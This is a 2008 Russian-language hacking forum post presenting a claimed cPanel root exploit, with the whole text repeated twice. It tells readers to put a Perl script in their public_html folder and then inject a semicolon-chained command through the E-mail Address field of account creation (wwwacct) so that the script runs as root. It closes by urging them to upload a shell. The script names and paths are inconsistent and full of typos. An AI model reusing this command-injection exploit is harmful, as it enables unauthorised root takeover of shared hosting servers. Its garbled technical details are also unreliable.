КВР
19.06.2008, 20:11
Cpanel
Версия: все
риск: очень высокий
Этот баг может привести к поднятию привелегий до рута
Cpanel самоя распространенная у хостеров предоставляющие площадки под сайт
официальный сайт: Cpanel.net
[code]
Как это работает?
Что происходит когда ты создаёш аккаунт ?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
Далее ты можеш запусьтить саму программу ! ( cpanel : doamin:2086)
К примеру:
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
iЕсли запрос прошол значит у вас есть доступ к деректории скрипта (Th3 r00t)
так ты можеш выполнять любые команды, к примеру
./scripts/wwwactt domain.com domain password (at) (dot) ir [email concealed];./home/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
()()()()()()()()()()()()()
Проверим:
++++++++++++++++++++++++++
Шаг первый
сохроните в фаил /home/user/public_html/do.pl .
#!/usr/bin/perl
$old='/home/user/public_html/test.txt';
$new='/home/root/kon.txt';
rename $old, $new;
++++++++++++++++++++++++++
Шаг второй
пазовите фаил test.txt в твоей public_html директории.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
Шаг третий
создайте аккаунт с следушей командой: (at) (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box
и нажмите нопку создать.
Теперь ты сможеш видеть /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
Ты можеш выполнить и ваш собственный код !Залить шелл и тп.
Версия: все
риск: очень высокий
Этот баг может привести к поднятию привелегий до рута
Cpanel самоя распространенная у хостеров предоставляющие площадки под сайт
официальный сайт: Cpanel.net
[code]
Как это работает?
Что происходит когда ты создаёш аккаунт ?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
Далее ты можеш запусьтить саму программу ! ( cpanel : doamin:2086)
К примеру:
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
iЕсли запрос прошол значит у вас есть доступ к деректории скрипта (Th3 r00t)
так ты можеш выполнять любые команды, к примеру
./scripts/wwwactt domain.com domain password (at) (dot) ir [email concealed];./home/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
()()()()()()()()()()()()()
Проверим:
++++++++++++++++++++++++++
Шаг первый
сохроните в фаил /home/user/public_html/do.pl .
#!/usr/bin/perl
$old='/home/user/public_html/test.txt';
$new='/home/root/kon.txt';
rename $old, $new;
++++++++++++++++++++++++++
Шаг второй
пазовите фаил test.txt в твоей public_html директории.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
Шаг третий
создайте аккаунт с следушей командой: (at) (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box
и нажмите нопку создать.
Теперь ты сможеш видеть /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
Ты можеш выполнить и ваш собственный код !Залить шелл и тп.